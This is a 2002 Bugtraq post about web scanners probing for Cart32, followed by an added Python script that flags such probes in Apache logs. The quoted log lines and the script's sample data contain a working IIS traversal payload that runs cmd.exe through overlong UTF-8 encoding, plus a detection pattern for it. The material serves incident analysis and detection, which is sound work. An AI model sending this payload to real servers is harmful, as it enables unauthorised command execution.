Smart Web Application Scanners (Sorta)

From: zeno (bugtraqat_private)
Date: Mon Feb 25 2002 - 08:34:19 PST


    Hey,
    
    I get tons of cart32 scans on my machine. I've noticed that some scanners
    are using "smarter" methods of scanning a host for such files.
    
    Examples
    
    202.95.138.6 - - [25/Feb/2002:11:15:46 -0500] "GET /snortcube.gif HTTP/1.0" 200 61988 "http://www.cgisecurity.com/archive/shop/cart32.txt/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)"
    202.95.138.6 - - [25/Feb/2002:11:15:46 -0500] "GET /snortcube.gif HTTP/1.0" 200 61988
    80.17.84.2 - - [25/Feb/2002:11:16:00 -0500] "GET /robots.txt HTTP/1.0" 200 19 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows NT; MS Search 4.0 Robot) Microsoft"
    80.17.84.2 - - [25/Feb/2002:11:16:00 -0500] "GET /robots.txt HTTP/1.0" 200 19
    202.95.138.6 - - [25/Feb/2002:11:16:12 -0500] "GET /archive/index.shtml HTTP/1.0" 200 4971 "http://www.cgisecurity.com/archive/shop/cart32.txt/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)"
    
    You'll notice it is trying any file or directory name with "cart32" for it being vulnerable.
    
    www.site/path/cart32.pdf, for example, will have an exploit appended to it like the one above.
    If you have cart32 installed and you have renamed it, you may want to peek in your logs or perhaps
    rename it to not contain cart32 in it at all (do with caution).
    
    Also, you will notice the request for robots.txt is sequential (may be related, perhaps).
    I've seen other scans using different exploits, but I figured some people may be interested.
    
    
    - zenoat_private
    
    ----------------------------------------------------------------------------
    This list is provided by the SecurityFocus ARIS analyzer service.
    For more information on this free incident handling, management 
    and tracking system please see: http://aris.securityfocus.com
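The scan pattern zeno describes, as an added detection example that is not part of the original post or of any SecurityFocus tool. It parses Apache combined-format lines (the three lines quoted above plus two constructed ones from the TEST-NET address 192.0.2.10, which is not a real host), decodes the overlong UTF-8 `%e0%80%af` the way a lenient server would, and flags any cart32 reference that also carries a `../` traversal or `cmd.exe`, in either the request path or the Referer header. The point worth noticing in the quoted lines is that the requests themselves (`/snortcube.gif`, `/archive/index.shtml`) are ordinary page fetches; the exploit string rides in the Referer, so a filter that only looks at the request line misses them. Function names and the 192.0.2.10 lines are assumptions made for this example.

```python
"""Flag cart32 probes in Apache combined-format access logs (added example).

Two things the plain log text hides:
  * the exploit string can arrive in the Referer header rather than the
    request line, so inspect both fields;
  * %e0%80%af is an overlong UTF-8 encoding of '/', so the '../' only shows
    up after a lenient decode like the one the targeted server performed.
"""
import re
from urllib.parse import unquote_to_bytes

# Apache "combined" format: ip ident user [time] "request" status size "referer" "ua"
# The referer/user-agent pair is optional so that "common"-format lines parse too.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
    r'(?: "(?P<referer>[^"]*)" "(?P<ua>[^"]*)")?\s*$'
)

# Sample input: the three lines quoted in the post, plus two constructed lines
# from 192.0.2.10 (TEST-NET): a benign fetch of a file whose name merely
# contains "cart32", and the same payload placed in the request line instead
# of the Referer.
SAMPLE_LOG = r'''
202.95.138.6 - - [25/Feb/2002:11:15:46 -0500] "GET /snortcube.gif HTTP/1.0" 200 61988 "http://www.cgisecurity.com/archive/shop/cart32.txt/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)"
80.17.84.2 - - [25/Feb/2002:11:16:00 -0500] "GET /robots.txt HTTP/1.0" 200 19 "-" "Mozilla/4.0 (compatible; MSIE 4.01; Windows NT; MS Search 4.0 Robot) Microsoft"
202.95.138.6 - - [25/Feb/2002:11:16:12 -0500] "GET /archive/index.shtml HTTP/1.0" 200 4971 "http://www.cgisecurity.com/archive/shop/cart32.txt/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\" "Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 4.0)"
192.0.2.10 - - [25/Feb/2002:11:20:00 -0500] "GET /archive/shop/cart32.txt HTTP/1.0" 200 3120 "-" "Mozilla/4.0"
192.0.2.10 - - [25/Feb/2002:11:20:01 -0500] "GET /archive/shop/cart32.txt/scripts/.%e0%80%af../..%e0%80%af../..%e0%80%af../winnt/system32/cmd.exe?/c+dir+c:\progra~1\mwainc\cart32\ HTTP/1.0" 404 312 "-" "Mozilla/4.0"
'''.strip().splitlines()

TRAVERSAL_RE = re.compile(r'(?:^|/)\.\./')


def lenient_utf8_decode(data: bytes) -> str:
    """Decode UTF-8, but also accept overlong sequences (e.g. E0 80 AF -> '/')
    that Python's strict decoder rejects. Invalid bytes become U+FFFD."""
    out, i, n = [], 0, len(data)
    while i < n:
        b = data[i]
        if b < 0x80:
            out.append(chr(b)); i += 1; continue
        if 0xC0 <= b < 0xE0:
            need, cp = 1, b & 0x1F
        elif 0xE0 <= b < 0xF0:
            need, cp = 2, b & 0x0F
        elif 0xF0 <= b < 0xF8:
            need, cp = 3, b & 0x07
        else:
            out.append('\ufffd'); i += 1; continue
        cont = data[i + 1:i + 1 + need]
        if len(cont) == need and all(0x80 <= c < 0xC0 for c in cont):
            for c in cont:
                cp = (cp << 6) | (c & 0x3F)
            out.append(chr(cp) if cp <= 0x10FFFF else '\ufffd')
            i += 1 + need
        else:
            out.append('\ufffd'); i += 1
    return ''.join(out)


def decode_url(raw: str) -> str:
    """Percent-decode, lenient-decode, fold backslashes to '/' and lowercase,
    so obfuscated and plain forms of the same path compare equal."""
    return lenient_utf8_decode(unquote_to_bytes(raw)).replace('\\', '/').lower()


def probe_reasons(url: str) -> list:
    """Why a URL looks like a cart32 probe; empty list means benign.
    A bare reference to a cart32 file is not enough on its own."""
    u = decode_url(url)
    if 'cart32' not in u:
        return []
    reasons = []
    if TRAVERSAL_RE.search(u):
        reasons.append('directory traversal after lenient decode')
    if 'cmd.exe' in u:
        reasons.append('cmd.exe reference')
    return reasons


def parse_line(line: str):
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def scan_log(lines) -> list:
    """One finding per suspicious field (request path or Referer)."""
    findings = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        for field in ('path', 'referer'):
            value = rec.get(field)
            if value and value != '-':
                reasons = probe_reasons(value)
                if reasons:
                    findings.append({'ip': rec['ip'], 'ts': rec['ts'],
                                     'field': field, 'reasons': reasons})
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} [{f['ts']}] in {f['field']}: {', '.join(f['reasons'])}")
```

Run against the sample, the two 202.95.138.6 lines are reported on their Referer field and the constructed 192.0.2.10 probe on its request path, while the plain fetch of `cart32.txt` is not reported at all; that last case matters because, as the post notes, any URL containing "cart32" gets targeted, so the file name alone cannot be the alert criterion.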
    
    This archive was generated by hypermail 2b30 : Mon Feb 25 2002 - 13:23:33 PST